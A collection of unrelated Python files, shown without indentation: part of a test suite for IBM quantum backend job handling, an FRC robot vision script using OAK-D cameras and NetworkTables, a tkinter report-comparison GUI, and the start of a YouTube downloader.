time.sleep(0.2)
result_array = [job.result() for job in job_array]
self.log.info('got back all job results')
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
@slow_test
@requires_device
def test_run_multiple_device(self, backend):
"""Test running multiple jobs in a real device."""
num_qubits = 5
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 3
job_array = [backend.run(transpile(qc, backend=backend))
for _ in range(num_jobs)]
time.sleep(3) # give time for jobs to start (better way?)
job_status = [job.status() for job in job_array]
num_init = sum(
[status is JobStatus.INITIALIZING for status in job_status])
num_queued = sum([status is JobStatus.QUEUED for status in job_status])
num_running = sum(
[status is JobStatus.RUNNING for status in job_status])
num_done = sum([status is JobStatus.DONE for status in job_status])
num_error = sum([status is JobStatus.ERROR for status in job_status])
self.log.info('number of currently initializing jobs: %d/%d',
num_init, num_jobs)
self.log.info('number of currently queued jobs: %d/%d',
num_queued, num_jobs)
self.log.info('number of currently running jobs: %d/%d',
num_running, num_jobs)
self.log.info('number of currently done jobs: %d/%d',
num_done, num_jobs)
self.log.info('number of errored jobs: %d/%d',
num_error, num_jobs)
self.assertTrue(num_jobs - num_error - num_done > 0)
# Wait for all the results.
for job in job_array:
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result_array = [job.result() for job in job_array]
# Ensure all jobs have finished.
self.assertTrue(
all([job.status() is JobStatus.DONE for job in job_array]))
self.assertTrue(all([result.success for result in result_array]))
# Ensure job ids are unique.
job_ids = [job.job_id() for job in job_array]
self.assertEqual(sorted(job_ids), sorted(list(set(job_ids))))
def test_cancel(self):
"""Test job cancellation."""
# Find the most busy backend
backend = most_busy_backend(self.provider)
submit_and_cancel(backend)
def test_retrieve_jobs(self):
"""Test retrieving jobs."""
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=5, skip=0,
start_datetime=self.last_month, ignore_composite_jobs=True)
self.assertLessEqual(len(job_list), 5)
for job in job_list:
self.assertTrue(isinstance(job.job_id(), str))
def test_retrieve_job(self):
"""Test retrieving a single job."""
retrieved_job = self.provider.backend.job(self.sim_job.job_id())
self.assertEqual(self.sim_job.job_id(), retrieved_job.job_id())
self.assertEqual(self.sim_job.qobj().to_dict(), retrieved_job.qobj().to_dict())
self.assertEqual(self.sim_job.result().get_counts(), retrieved_job.result().get_counts())
@requires_device
def test_retrieve_job_uses_appropriate_backend(self, backend):
"""Test that retrieved jobs come from their appropriate backend."""
backend_1 = backend
# Get a second backend.
backend_2 = None
provider = backend.provider()
for my_backend in provider.backends():
if my_backend.status().operational and my_backend.name() != backend_1.name():
backend_2 = my_backend
break
if not backend_2:
raise SkipTest('Skipping test that requires multiple backends')
job_1 = backend_1.run(transpile(ReferenceCircuits.bell(), backend_1))
job_2 = backend_2.run(transpile(ReferenceCircuits.bell(), backend_2))
# test a retrieved job's backend is the same as the queried backend
self.assertEqual(provider.backend.job(job_1.job_id()).backend().name(),
backend_1.name())
self.assertEqual(provider.backend.job(job_2.job_id()).backend().name(),
backend_2.name())
# Cleanup
for job in [job_1, job_2]:
cancel_job(job)
def test_retrieve_job_error(self):
"""Test retrieving an invalid job."""
self.assertRaises(IBMJobNotFoundError,
self.provider.backend.job, 'BAD_JOB_ID')
def test_retrieve_jobs_status(self):
"""Test retrieving jobs filtered by status."""
status_args = [JobStatus.DONE, 'DONE', [JobStatus.DONE], ['DONE']]
for arg in status_args:
with self.subTest(arg=arg):
backend_jobs = self.provider.backend.jobs(
backend_name=self.sim_backend.name(),
limit=5, skip=5, status=arg, start_datetime=self.last_month,
ignore_composite_jobs=True)
self.assertTrue(backend_jobs)
for job in backend_jobs:
self.assertTrue(job.status() is JobStatus.DONE,
"Job {} has status {} when it should be DONE"
.format(job.job_id(), job.status()))
def test_retrieve_multiple_job_statuses(self):
"""Test retrieving jobs filtered by multiple job statuses."""
statuses_to_filter = [JobStatus.ERROR, JobStatus.CANCELLED]
status_filters = [
[JobStatus.ERROR, JobStatus.CANCELLED],
['ERROR', 'CANCELLED'],
[JobStatus.ERROR, 'CANCELLED']
]
job_to_cancel = submit_and_cancel(backend=self.sim_backend)
job_to_fail = submit_job_bad_shots(backend=self.sim_backend)
job_to_fail.wait_for_final_state()
for status_filter in status_filters:
with self.subTest(status_filter=status_filter):
job_list = self.provider.backend.jobs(
status=status_filter,
start_datetime=self.last_month,
ignore_composite_jobs=True)
job_list_ids = [_job.job_id() for _job in job_list]
if job_to_cancel.status() is JobStatus.CANCELLED:
self.assertIn(job_to_cancel.job_id(), job_list_ids)
self.assertIn(job_to_fail.job_id(), job_list_ids)
for filtered_job in job_list:
self.assertIn(filtered_job._status, statuses_to_filter,
"job {} has status {} but should be one of {}"
.format(filtered_job.job_id(), filtered_job._status,
statuses_to_filter))
def test_retrieve_active_jobs(self):
"""Test retrieving jobs that are currently unfinished."""
backend = most_busy_backend(self.provider)
active_job_statuses = {api_status_to_job_status(status) for status in ApiJobStatus
if status not in API_JOB_FINAL_STATES}
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
active_jobs = backend.active_jobs()
if not job.in_final_state(): # Job is still active.
self.assertIn(job.job_id(), [active_job.job_id() for active_job in active_jobs])
for active_job in active_jobs:
self.assertTrue(active_job._status in active_job_statuses,
"status for job {} is '{}' but it should be '{}'."
.format(active_job.job_id(), active_job._status, active_job_statuses))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_queued(self):
"""Test retrieving jobs that are queued."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
provider = backend.provider()
# Wait for the job to queue, run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.QUEUED, JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_queued = provider.backend.jobs(status=JobStatus.QUEUED, limit=5,
start_datetime=self.last_month,
ignore_composite_jobs=True)
if before_status is JobStatus.QUEUED and job.status() is JobStatus.QUEUED:
self.assertIn(job.job_id(), [queued_job.job_id() for queued_job in job_list_queued],
"job {} is queued but not retrieved when filtering for queued jobs."
.format(job.job_id()))
for queued_job in job_list_queued:
self.assertTrue(queued_job._status == JobStatus.QUEUED,
"status for job {} is '{}' but it should be {}"
.format(queued_job.job_id(), queued_job._status, JobStatus.QUEUED))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_running(self):
"""Test retrieving jobs that are running."""
job = self.sim_backend.run(self.bell)
# Wait for the job to run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_running = self.provider.backend.jobs(status=JobStatus.RUNNING, limit=5,
start_datetime=self.last_month,
ignore_composite_jobs=True)
if before_status is JobStatus.RUNNING and job.status() is JobStatus.RUNNING:
self.assertIn(job.job_id(), [rjob.job_id() for rjob in job_list_running])
for rjob in job_list_running:
self.assertTrue(rjob._status == JobStatus.RUNNING,
"Status for job {} is '{}' but should be RUNNING"
.format(rjob.job_id(), rjob._status))
def test_retrieve_jobs_start_datetime(self):
"""Test retrieving jobs created after a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, start_datetime=past_month,
ignore_composite_jobs=True)
self.assertTrue(job_list)
for job in job_list:
self.assertGreaterEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_end_datetime(self):
"""Test retrieving jobs created before a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, end_datetime=past_month,
ignore_composite_jobs=True)
self.assertTrue(job_list)
for job in job_list:
self.assertLessEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_between_datetimes(self):
"""Test retrieving jobs created between two specified datetimes."""
date_today = datetime.now()
past_month = date_today - timedelta(30)
past_two_month = date_today - timedelta(60)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
past_two_month_tz_aware = past_two_month.replace(tzinfo=tz.tzlocal())
with self.subTest():
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=2,
start_datetime=past_two_month, end_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertTrue(
(past_two_month_tz_aware <= job.creation_date() <= past_month_tz_aware),
'job {} creation date {} not within range'.format(
job.job_id(), job.creation_date()))
def test_retrieve_jobs_order(self):
"""Test retrieving jobs with different orders."""
job = self.sim_backend.run(self.bell)
job.wait_for_final_state()
newest_jobs = self.provider.backend.jobs(
limit=10, status=JobStatus.DONE, descending=True, start_datetime=self.last_month,
ignore_composite_jobs=True)
self.assertIn(job.job_id(), [rjob.job_id() for rjob in newest_jobs])
oldest_jobs = self.provider.backend.jobs(
limit=10, status=JobStatus.DONE, descending=False, start_datetime=self.last_month,
ignore_composite_jobs=True)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in oldest_jobs])
def test_retrieve_failed_job_simulator_partial(self):
"""Test retrieving partial results from a simulator backend."""
job = submit_job_one_bad_instr(self.sim_backend)
result = job.result(partial=True)
self.assertIsInstance(result, Result)
self.assertTrue(result.results[0].success)
self.assertFalse(result.results[1].success)
@slow_test
def test_pulse_job(self):
"""Test running a pulse job."""
backends = self.provider.backends(open_pulse=True, operational=True)
if not backends:
raise SkipTest('Skipping pulse test since no pulse backend found.')
backend = least_busy(backends)
config = backend.configuration()
defaults = backend.defaults()
inst_map = defaults.instruction_schedule_map
# Run 2 experiments - 1 with x pulse and 1 without
x = inst_map.get('x', 0)
measure = inst_map.get('measure', range(config.n_qubits)) << x.duration
ground_sched = measure
excited_sched = x | measure
schedules = [ground_sched, excited_sched]
job = backend.run(schedules, meas_level=1, shots=256)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
self.assertTrue(job.done(), "Job {} didn't complete successfully.".format(job.job_id()))
self.assertIsNotNone(job.result(), "Job {} has no result.".format(job.job_id()))
def test_retrieve_from_retired_backend(self):
"""Test retrieving a job from a retired backend."""
saved_backends = copy.copy(self.provider._backends)
try:
del self.provider._backends[self.sim_backend.name()]
new_job = self.provider.backend.job(self.sim_job.job_id())
self.assertTrue(isinstance(new_job.backend(), IBMRetiredBackend))
self.assertNotEqual(new_job.backend().name(), 'unknown')
last_month_jobs = self.provider.backend.jobs(start_datetime=self.last_month)
last_month_job_ids = [job.job_id() for job in last_month_jobs]
self.assertIn(new_job.job_id(), last_month_job_ids)
finally:
self.provider._backends = saved_backends
def test_refresh_job_result(self):
"""Test re-retrieving job result via refresh."""
result = self.sim_job.result()
# Save original cached results.
cached_result = copy.deepcopy(result.to_dict())
self.assertTrue(cached_result)
# Modify cached results.
result.results[0].header.name = 'modified_result'
self.assertNotEqual(cached_result, result.to_dict())
self.assertEqual(result.results[0].header.name, 'modified_result')
# Re-retrieve result via refresh.
result = self.sim_job.result(refresh=True)
self.assertDictEqual(cached_result, result.to_dict())
self.assertNotEqual(result.results[0].header.name, 'modified_result')
def test_wait_for_final_state(self):
"""Test waiting for job to reach final state."""
def final_state_callback(c_job_id, c_status, c_job, **kwargs):
"""Job status query callback function."""
self.assertEqual(c_job_id, job.job_id())
self.assertNotIn(c_status, JOB_FINAL_STATES)
self.assertEqual(c_job.job_id(), job.job_id())
self.assertIn('queue_info', kwargs)
queue_info = kwargs.pop('queue_info', None)
callback_info['called'] = True
if wait_time is None:
# Look for status change.
data = {'status': c_status, 'queue_info': queue_info}
self.assertNotEqual(data, callback_info['last data'])
callback_info['last data'] = data
else:
# Check called within wait time.
if callback_info['last call time'] and job._status not in JOB_FINAL_STATES:
self.assertAlmostEqual(
time.time() - callback_info['last call time'], wait_time, delta=0.2)
callback_info['last call time'] = time.time()
def job_canceller(job_, exit_event, wait):
exit_event.wait(wait)
cancel_job(job_)
wait_args = [2, None]
saved_api = self.sim_backend._api_client
try:
self.sim_backend._api_client = BaseFakeAccountClient(job_class=CancelableFakeJob)
for wait_time in wait_args:
with self.subTest(wait_time=wait_time):
# Put callback data in a dictionary to make it mutable.
callback_info = {'called': False, 'last call time': 0.0, 'last data': {}}
cancel_event = Event()
job = self.sim_backend.run(self.bell)
# Cancel the job after a while.
Thread(target=job_canceller, args=(job, cancel_event, 7), daemon=True).start()
try:
job.wait_for_final_state(timeout=10, wait=wait_time,
callback=final_state_callback)
self.assertTrue(job.in_final_state())
self.assertTrue(callback_info['called'])
cancel_event.set()
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
finally:
self.sim_backend._api_client = saved_api
def test_wait_for_final_state_timeout(self):
"""Test waiting for job to reach final state times out."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend))
try:
self.assertRaises(IBMJobTimeoutError, job.wait_for_final_state, timeout=0.1)
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
cancel_job(job)
def test_job_submit_partial_fail(self):
"""Test job submit partial fail."""
job_id = []
def _side_effect(self, *args, **kwargs):
# pylint: disable=unused-argument
job_id.append(self.job_id)
raise RequestsApiError('Kaboom')
fail_points = ['put_object_storage', 'callback_upload']
for fail_method in fail_points:
with self.subTest(fail_method=fail_method):
with mock.patch.object(RestJob, fail_method,
side_effect=_side_effect, autospec=True):
with self.assertRaises(IBMBackendApiError):
self.sim_backend.run(self.bell)
self.assertTrue(job_id, "Job ID not saved.")
job = self.provider.backend.job(job_id[0])
self.assertEqual(job.status(), JobStatus.CANCELLED,
f"Job {job.job_id()} status is {job.status()} and not cancelled!")
def test_job_circuits(self):
"""Test job circuits."""
self.assertEqual(str(self.bell), str(self.sim_job.circuits()[0]))
def test_job_backend_options(self):
"""Test job backend options."""
run_config = {'shots': 2048, 'memory': True}
job = self.sim_backend.run(self.bell, **run_config)
self.assertLessEqual(run_config.items(), job.backend_options().items())
def test_job_header(self):
"""Test job header."""
|
main.py
|
#!/usr/bin/env python3
import argparse
import operator
import threading
import numpy as np
from time import sleep
import cv2
import depthai as dai
import socket
from common.config import NN_IMG_SIZE
from common.cscore_stream import CsCoreStream
from pipelines import goal_edge_depth_detection, object_edge_detection
import logging
from common import target_finder
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
except:
ip_address = 'localhost'
port1 = 5801
port2 = 5802
self.device_list = {"OAK-D_Goal": {
'name': "OAK-D_Goal",
'id': "14442C1091398FD000",
# 'id': "14442C10218CCCD200",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-D_Goal")
}, "OAK-1_Intake": {
'name': "OAK-1_Intake",
'id': "14442C1011043ED700",
# 'id': "14442C10C14F47D700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-1_Intake")
}}
self.goal_pipeline, self.goal_labels = goal_edge_depth_detection.create_pipeline("infiniteRecharge2021")
self.intake_pipeline, self.intake_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.oak_d_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
# self.oak_d_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
# self.oak_1_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
kernel = np.ones((3, 3), np.uint8)
edgeFrame = cv2.morphologyEx(edgeFrame, cv2.MORPH_CLOSE, kernel, iterations=1)
# edgeFrame = cv2.threshold(edgeFrame, 20, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-D_Goal']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
else:
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_hexagon_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
angle_offset = (target_x - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
nt_tab.putNumber("tz", bbox['depth_z'])
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']),
(255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128),
thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-D_Goal']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_d_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_intake_frame(self, frame, edgeFrame, bboxes):
edgeFrame = cv2.threshold(edgeFrame, 60, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-1_Intake']['nt_tab']
filtered_bboxes = []
for bbox in bboxes:
if self.intake_labels[bbox['label']] in valid_labels:
filtered_bboxes.append(bbox)
filtered_bboxes.sort(key=operator.itemgetter('size'), reverse=True)
if len(filtered_bboxes) == 0:
nt_tab.putNumber("tv", 0)
nt_tab.putNumberArray("ta", [0])
else:
nt_tab.putNumber("tv", 1)
target_angles = []
for bbox in filtered_bboxes:
angle_offset = (bbox['x_mid'] - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
target_angles.append(angle_offset)
bbox['angle_offset'] = angle_offset
nt_tab.putNumberArray("ta", target_angles)
fps = self.device_list['OAK-1_Intake']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, filtered_bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-D_Goal']['id'])
self.device_list['OAK-D_Goal']['nt_tab'].putBoolean("OAK-D_Goal Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-1_Intake']['id'])
self.device_list['OAK-1_Intake']['nt_tab'].putBoolean("OAK-1_Intake Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_intake_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
self.device_list['OAK-D_Goal']['nt_tab'].putString("OAK-D_Goal Stream", self.device_list['OAK-D_Goal']['stream_address'])
for frame, edgeFrame, bboxes in goal_edge_depth_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_intake_detection(self, device_info):
self.device_list['OAK-1_Intake']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1_Intake']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_intake_frame(frame, edgeFrame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.putText(edgeFrame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "z: {}".format(round(bbox['depth_z'], 2)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(edgeFrame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 130),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-D Goal Edge", edgeFrame)
cv2.imshow("OAK-D Goal ", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_intake_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_intake_frame(frame, edgeFrame, bboxes)
for i, bbox in enumerate(bboxes):
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
frame_color = (0, 255, 0) if i == 0 else (0, 150, 150)
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), frame_color, 2)
cv2.putText(frame, "x: {}".format(round(bbox['x_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "size: {}".format(round(bbox['size'], 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Intake Edge", edgeFrame)
cv2.imshow("OAK-1 Intake", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting goal-depth-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
|
main.py
|
import logging
import queue
import threading
from threading import Thread
from tkinter import ttk, DISABLED, NORMAL, NSEW
from tkinter.scrolledtext import ScrolledText
import tkinter as tk
from tkinter import N, W, S, E, Tk, BooleanVar
import validators
from bavli_reports.report_worker import do_report_work
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def thread_worker(**kwargs):
logger.info("Starting the magic... \U0001F52E \U00002728 \U0001F609")
def logging_func(msg, level=logging.INFO):
logger.log(level, msg)
def do_work():
try:
do_report_work(bavli_report_url=bavli_url.get(), external_report_url=external_url.get(),
logging_func=logging_func)
except Exception as e:
logger.error(f"Oops something went wrong! {e}")
threading.Thread(target=do_work).start()
class QueueHandler(logging.Handler):
"""Class to send logging records to a queue
It can be used from different threads
"""
def __init__(self, log_queue):
super().__init__()
self.log_queue = log_queue
def emit(self, record):
self.log_queue.put(record)
class ConsoleUi:
"""Poll messages from a logging queue and display them in a scrolled text widget"""
def __init__(self, frame):
self.frame = frame
self.frame.rowconfigure(0, weight=1)
self.frame.columnconfigure(0, weight=1)
# Create a ScrolledText wdiget
self.scrolled_text = ScrolledText(frame, state='disabled', background='white')
self.scrolled_text.grid(row=0, column=0, rowspan=3, columnspan=3, sticky=NSEW)
self.scrolled_text.configure(font=('TkFixedFont', 16))
self.scrolled_text.tag_config('NOTSET', foreground='green')
self.scrolled_text.tag_config('INFO', foreground='black')
self.scrolled_text.tag_config('DEBUG', foreground='purple')
self.scrolled_text.tag_config('WARNING', foreground='orange')
self.scrolled_text.tag_config('ERROR', foreground='red')
self.scrolled_text.tag_config('CRITICAL', foreground='red', underline=1)
# Create a logging handler using a queue
self.log_queue = queue.Queue()
self.queue_handler = QueueHandler(self.log_queue)
formatter = logging.Formatter(fmt='%(asctime)s Hagai says: %(message)s', datefmt='%H:%M:%S')
self.queue_handler.setFormatter(formatter)
self.queue_handler.setLevel(logging.DEBUG)
logger.addHandler(self.queue_handler)
# Start polling messages from the queue
self.frame.after(100, self.poll_log_queue)
def display(self, record):
msg = self.queue_handler.format(record)
self.scrolled_text.configure(state='normal')
self.scrolled_text.insert(tk.END, msg + '\n', record.levelname)
self.scrolled_text.configure(state='disabled')
# Autoscroll to the bottom
self.scrolled_text.yview(tk.END)
def poll_log_queue(self):
# Check every 100ms if there is a new message in the queue to display
while True:
try:
record = self.log_queue.get(block=False)
except queue.Empty:
break
else:
self.display(record)
self.frame.after(100, self.poll_log_queue)
if __name__ == "__main__":
urls = []
def check_both_url():
for url in urls:
if not validators.url(url.get()):
start_button["state"] = DISABLED
return
start_button["state"] = NORMAL
logger.info("Ok we are all set!")
root = Tk()
root.title("Report Master")
s = ttk.Style()
s.configure("Go.TButton", foreground='green', font=('Ariel', 16))
s.configure("TFrame", background='white')
content = ttk.Frame(root, padding=(3, 3, 12, 12))
greeting_label = ttk.Label(content, text="Hi Guy, welcome to the reports master", anchor="center")
start_button = ttk.Button(content, text="Go!", state=DISABLED, command=thread_worker, style="Go.TButton")
bavli_label = ttk.Label(content, text="Your sheet URL")
bavli_string_var = tk.StringVar()
bavli_string_var.trace("w", lambda name, index, mode, sv=bavli_string_var: check_both_url())
bavli_url = ttk.Entry(content, textvariable=bavli_string_var)
external_string_var = tk.StringVar()
external_string_var.trace("w", lambda name, index, mode, sv=bavli_string_var: check_both_url())
external_label = ttk.Label(content, text="External sheet URL")
external_url = ttk.Entry(content, textvariable=external_string_var)
urls.extend([bavli_url, external_url])
matches_var = BooleanVar(value=False)
show_matches = ttk.Checkbutton(content, text="Show Matches", variable=matches_var, onvalue=True)
frame = ttk.LabelFrame(content, text="Status", borderwidth=5, relief="ridge")
console_ui = ConsoleUi(frame=frame)
content.grid(column=0, row=0, sticky=(N, S, E, W))
greeting_label.grid(column=0, row=0, columnspan=3, sticky=(N, S, E, W))
bavli_label.grid(column=0, row=1, sticky=(N, W), padx=5)
bavli_url.grid(column=1, row=1, columnspan=2, sticky=(N, E, W), pady=5, padx=5)
external_label.grid(column=0, row=2, sticky=(N, W), padx=5)
external_url.grid(column=1, row=2, columnspan=2, sticky=(N, E, W), pady=5, padx=5)
# show_matches.grid(column=0, row=3)
frame.grid(column=0, row=4, columnspan=3, rowspan=3, sticky=(N, S, E, W))
start_button.grid(column=1, row=7, sticky=(N, S, E, W))
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
content.columnconfigure(1, weight=3)
content.columnconfigure(2, weight=3)
content.rowconfigure(4, weight=1)
content.rowconfigure(5, weight=1)
content.rowconfigure(6, weight=1)
content.rowconfigure(7, weight=1)
root.mainloop()
|
main.py
|
import threading
from tkinter.filedialog import *
from pytube import YouTube, request
# dark mode :
def darkmode():
global btnState
